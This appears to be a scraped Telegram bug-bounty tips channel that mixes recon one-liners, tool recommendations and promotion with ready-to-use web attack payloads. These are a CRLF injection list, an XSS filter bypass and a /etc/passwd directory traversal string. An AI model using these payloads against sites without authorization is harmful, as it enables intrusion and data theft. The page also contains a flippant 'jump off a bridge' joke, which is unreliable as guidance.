现已上线!2025 年 Telegram 研究 — 年度关键洞察 
Bug bounty Tips
前往频道在 Telegram
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
显示更多5 812
订阅者
+824 小时
+657 天
+39030 天
帖子存档
5 814
How to fix the Crowdstrike thing:
1. Boot Windows into safe mode
2. Go to C:\Windows\System32\drivers\CrowdStrike
3. Delete C-00000291*.sys
4. Repeat for every host in your enterprise network including remote workers
5. If you're using BitLocker jump off a bridge
5 814
Bug Bounty Tip
CRLF Injection Attack Payload List
🔹 /%%0a0aSet-Cookie:crlf
🔹 /%0aSet-Cookie:crlf
🔹 /%0d%0aSet-Cookie:crlf
🔹 /%0dSet-Cookie:crlf
🔹 /%23%0aSet-Cookie:crlf
🔹 /%23%0d%0aSet-Cookie:crlf
🔹 /%23%0dSet-Cookie:crlf
🔹 /%25%30%61Set-Cookie:crlf
🔹 /%25%30aSet-Cookie:crlf
🔹 /%250aSet-Cookie:crlf
🔹 /%25250aSet-Cookie:crlf
🔹 /%2e%2e%2f%0d%0aSet-Cookie:crlf
🔹 /%2f%2e%2e%0d%0aSet-Cookie:crlf
🔹 /%2F..%0d%0aSet-Cookie:crlf
🔹 /%3f%0d%0aSet-Cookie:crlf
🔹 /%3f%0dSet-Cookie:crlf
🔹 /%u000aSet-Cookie:crlf
🔹 /%E5%98%8D%E5%98%8ASet-Cookie:crlf
#bugbounty #cybersecurity #ethicalhacking
5 814
Just discovered https://web-check.xyz and recommend that you do to!
It's an ALL-IN-ONE OSINT tool for analysing websites. You give it a URL and it gives you:
Server Location and IP info
SSL Certificate
Domain Whois
Server info
Cookies
Headers
DNS Records
HTTP Security
Social Tags
Security.txt
DNS Server
Firewall
DNS Security
HSTS Check
Threats
TLS Cipher Suites
TLS Security Issues
TLS Handshake Simulation
Redirects
Linked Pages
Crawl Rules
Server Status
Open ports
Text records
Carbon footprint
5 814
Check out this new. Post on my Instagram
https://www.instagram.com/p/C9jWm19SikU/?igsh=MzRlODBiNWFlZA==
5 814
Hello, guys good evening, this week VDP program is here check this website and try out and do update things and let us know how the BugBounty is going on
https://www.humanprotocol.org/vulnerability-disclosure-policy
5 814
Web Hacking Tip: - jhaddix
When using ffuf change the user agent string as the default one "Fuzz Faster U Fool" is commonly blocked.
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"5 814
📌Targeted Scanning with Burp Suite: A Regex Pattern for example.com
❓As a penetration tester or bug bounty hunter, it's essential to focus your scanning efforts on the specific domains and subdomains that matter. In this post, we'll explore a regex pattern that helps you target the example.com domain and its subdomains in Burp Suite, and how to combine it with powerful tools to get more fine-grained results.
💵The Regex Pattern:
(^|^[^:]+:\/\/|[^\.]+\.)example.*
🛍Let's break down this pattern:
(^|^[^:]+:\/\/): Matches the protocol and subdomain (if any) before the main domain example.
([^\.]+\.): Matches the subdomain (if any) before the main domain example.
example: The main domain name, replaced with example in this example.
.*: Matches any characters (including none) after the main domain name.
🛍This pattern will match any URLs that contain the domain example and may include:
Protocols like http:// or https://
Subdomains like sub.example or foo.bar.example
Paths and query strings like /path/to/resource?param=value
❗️Using this Pattern in Burp Suite:
✔️Add this regex pattern to the "Add Scope" section in Burp Suite to specify the scope of URLs that Burp should target. This will help Burp focus on the specific domain and its subdomains, and ignore other unrelated URLs.
❗️Combining with Powerful Tools:
✔️To get more fine-grained results, combine this regex pattern with the following tools in Burp Suite:
1.Burp JS Link Finder: Finds JavaScript files and links on the target website.
2.Paraminer: Analyzes HTTP requests and responses to identify potential parameter manipulation vulnerabilities.
3.Logger++: Enhances the logging capabilities of Burp, making it easier to analyze and filter log data.
4.Turbo Intruder: Automates and accelerates the process of sending multiple requests to a target system.
5.SQLMap: Detects and exploits SQL injection vulnerabilities in the targeted scope.
⚡️By using this regex pattern and combining it with these powerful tools, you can perform a more targeted and efficient vulnerability scan on the example.com domain and its subdomains.
☄️Happy Hunting!☄️
5 814
/****/: This is a directory traversal sequence, which is used to navigate through the file system. The **** is a common pattern used to traverse directories, allowing an attacker to access files outside of the web root.
5 814
𝗫𝗦𝗦 𝗕𝘆𝗽𝗮𝘀𝘀 𝗣𝗮𝘆𝗹𝗼𝗮𝗱:
javascript:var a="ale";var b="rt";var c="()";decodeURI("<button popovertarget=x>Click me</button><cybertix onbeforetoggle="+a+b+c+" popover id=x>CYBERTIX</cybertix>")
BY @cybertix
5 814
Subdomain finder one-liners
find subdomains from various sources and add them to output.txt file. (will need a sort out)
(curl -s "https://rapiddns.io/subdomain/$TARGET?full=1#result" 2>/dev/null | grep "<td><a" 2>/dev/null | cut -d '"' -f 2 2>/dev/null | grep http 2>/dev/null | cut -d '/' -f3 2>/dev/null | sed 's/#results//g' 2>/dev/null | sort -u 2>/dev/null) > output.txt
(curl -s https://dns.bufferover.run/dns?q=.$TARGET 2>/dev/null |jq -r .FDNS_A[] 2>/dev/null |cut -d',' -f2 2>/dev/null|sort -u 2>/dev/null ) >> output.txt
(curl -s "https://riddler.io/search/exportcsv?q=pld:${TARGET}" 2>/dev/null| grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" 2>/dev/null| sort -u 2>/dev/null ) >> output.txt
(curl -s "https://www.virustotal.com/ui/domains/${TARGET}/subdomains?limit=40" 2>/dev/null | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" 2>/dev/null | sort -u 2>/dev/null ) >> output.txt
(curl -s "https://certspotter.com/api/v1/issuances?domain=${TARGET}&include_subdomains=true&expand=dns_names" 2>/dev/null | jq .[].dns_names 2>/dev/null | tr -d '[]"\n ' 2>/dev/null | tr ',' '\n'2>/dev/null ) >> output.txt
(curl -s "https://jldc.me/anubis/subdomains/${TARGET}" 2>/dev/null | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" 2>/dev/null | sort -u 2>/dev/null ) >> output.txt
(curl -s "https://securitytrails.com/list/apex_domain/${TARGET}" 2>/dev/null | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" 2>/dev/null| grep "${TARGET}" 2>/dev/null | sort -u 2>/dev/null ) >> output.txt
(curl --silent https://sonar.omnisint.io/subdomains/$TARGET 2>/dev/null | grep -oE "[a-zA-Z0-9._-]+\.$TARGET" 2>/dev/null | sort -u 2>/dev/null ) >> output.txt
(curl --silent -X POST https://synapsint.com/report.php -d "name=https%3A%2F%2F$TARGET" 2>/dev/null| grep -oE "[a-zA-Z0-9._-]+\.$TARGET" 2>/dev/null | sort -u 2>/dev/null ) >> output.txt
(curl -s "https://crt.sh/?q=%25.$TARGET&output=json" 2>/dev/null| jq -r '.[].name_value' 2>/dev/null| sed 's/\*\.//g' 2>/dev/null| sort -u 2>/dev/null ) >> output.txt5 814
This is totally wrong😕
Mr @beluga1000, hack went horribly wrong😭
.
.
.
[beluga, hacking, funny, password, wifi, hacker, Facebook, bank, discord]
.
👉 Follow us for more cybersecurity tips and tricks!
🌐 Visit us at www.cipherops.xyz
📲 @cipherops.tech
.
.
.
.
.
.
.
.
.
.
✔️ Share It with Your Friends.
🔗 CHECKOUT THE LINK IN BIO
🔥 Don’t miss the HIGHLIGHTS
🤔 Any queries? Don’t hesitate to DM.
❤️ LIKE, COMMENT, SHARE and SAVE the post.
#beluga #comedy #funny #crying #cyber #cyberpunk #cybersecuritytips #tools #kalilinux
#bugbountyhunting #bugbountytips #bug #hack #hacking #hackingtools #trending #trend
https://www.instagram.com/reel/C9ePMVeSx9Z/?igsh=MTc4MmM1YmI2Ng==
5 814
I want update on the BugBounty program guys, atleast I should know if this working or not.
Please update if you guys did anything or anyone reported.
5 814
Check out this 4 Essentials of hacking
https://www.instagram.com/p/C9bylMWSO_l/?igsh=MzRlODBiNWFlZA==
5 814
Repost from CYBER TRICKS ZONE 🇮🇳🚩
🌟Subdominator🌟 is a powerful tool for passive subdomain enumeration during bug hunting and reconnaissance processes.
📥 https://github.com/sanjai-AK47/Subdominator
5 814
🚨A directory traversal bug in a private Intigrity program.
💥Payload: /****/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
5 814
Looking to break into Offensive Security?
Here's a short roadmap:
- Master fundamentals: OS, Networks, etc.
- Linux Skills (cmdline) & Windows - Powershell
- Develop web skills: Front-End & Back-End
- Dive into basic CTF/WAR Games
- Learn OWASP Top 10 & More CWEs
- Hands-on practice: TryHackMe, HTB (Academy & Labs), PortSwigger, PentesterLab, etc.
- Gain Bug Bounty experience: Report writing, CVSS Calc, etc.
- Contribute to CVEs.
- Daily practice & reading security blogs.
- Learn more Technologies & Protocols
- Learn about the existing vuln. & their root cause
- Pursue certifications like OSCP, CPTS, OSEP (optional)
- Stay updated with the latest trends
5 814
Stop🛑
The ultimate linux command Cheatsheet for BugBounty hunters
🛠️ Discover hidden vulnerabilities with powerful linux commands!
💻 Boot your bug bounty game and speed up your recon process.
🔮From basic to advanced, get all the commands you need in one place.
⏭️ Swipe through for:
1. Basic navigation commands
2. File management commands
3. Permission and ownership commands
4. Networking commands
5. Process management commands
👉 Follow us for more cybersecurity tips and tricks!
🌐 Visit us at www.cipherops.xyz
📲 @cipherops.tech
✔️ Share It with Your Friends.
🔗 CHECKOUT THE LINK IN BIO
🔥 Don’t miss the HIGHLIGHTS
🤔 Any queries? Don’t hesitate to DM.
❤️ LIKE, COMMENT, SHARE and SAVE the post.
#cybersecurityawareness #cybersecurity #bugbounty #bugbountytips #bugbountyhunter #bugbountyhunting #pythonprogramming #infosec #security #malware #kalilinux #file #command #networking #network #trending #trend
https://www.instagram.com/p/C9UcAiOStdR/?igsh=MTc4MmM1YmI2Ng==
